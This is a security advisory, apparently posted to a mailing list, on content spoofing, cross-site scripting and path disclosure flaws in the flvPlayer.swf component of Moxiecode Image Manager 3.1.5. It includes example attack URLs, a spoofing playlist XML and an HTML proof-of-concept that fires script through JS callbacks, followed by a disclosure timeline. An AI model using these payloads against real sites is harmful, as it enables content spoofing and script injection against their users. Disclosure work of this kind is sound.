Moxiecode Image Manager 3.1.5 XSS / Content Spoofing / Disclosure

`Hello list!  
  
I want to warn you about vulnerabilities in Moxiecode Image Manager   
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as   
MCImageManager, as all web applications which have MCImageManager in their   
bundle.  
  
These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure   
vulnerabilities. About Content Spoofing and Cross-Site Scripting   
vulnerabilities in flvPlayer I informed developer already in October 2011   
(it was part of Media plugin for TinyMCE) and disclosed them in November.   
After my informing he fixed these holes in November 2011 in Media plugin.   
But he forgot to fix them in MCImageManager plugin.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Moxiecode  
http://www.moxiecode.com  
  
----------  
Details:  
----------  
  
Content Spoofing (WASC-12):  
  
Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay   
and startImage, which allows to spoof content of flash - i.e. by setting   
addresses of video and/or image files from other site.  
  
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv  
  
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg  
  
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg  
  
Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay,   
which allows to spoof content of flash - i.e. by setting address of playlist   
file from other site (parameters thumbnail and url in xml-file accept   
arbitrary addresses).  
  
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml  
  
File 1.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<playlist>  
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>  
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>  
</playlist>  
  
XSS (WASC-08):  
  
If at the site at page with flvPlayer.swf (with parameter jsCallback=true,   
or if there is possibility to set this parameter for flv_player.swf) there   
is possibility to include JS code with function flvStart() and/or flvEnd()   
(via HTML Injection), then it's possible to conduct XSS attack. I.e.   
JS-callbacks can be used for XSS attack.  
  
Example of exploit:  
  
<html>  
<body>  
<script>  
function flvStart() {  
alert('XSS');  
}  
function flvEnd() {  
alert('XSS');  
}  
</script>  
<object width="50%" height="50%">  
<param name=movie value="flvPlayer.swf">  
<param name=quality value=high>  
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%"   
height="50%" quality=high   
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"   
type="application/x-shockwave-flash"></embed>  
</object>  
</body>  
</html>  
  
Full Path Disclosure (WASC-13):  
  
Full path In cookies MCManager_im_lastPath and MCManagerHistoryCookie_im.  
  
------------  
Timeline:  
------------   
  
2011.10.20 - informed developer of flvPlayer.  
2011.10.20 - informed developer of TinyMCE (which bundled with flvPlayer in   
Media plugin).  
2013.06.11 - announced at my site.  
2013.06.13 - informed developer of MCImageManager.  
2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`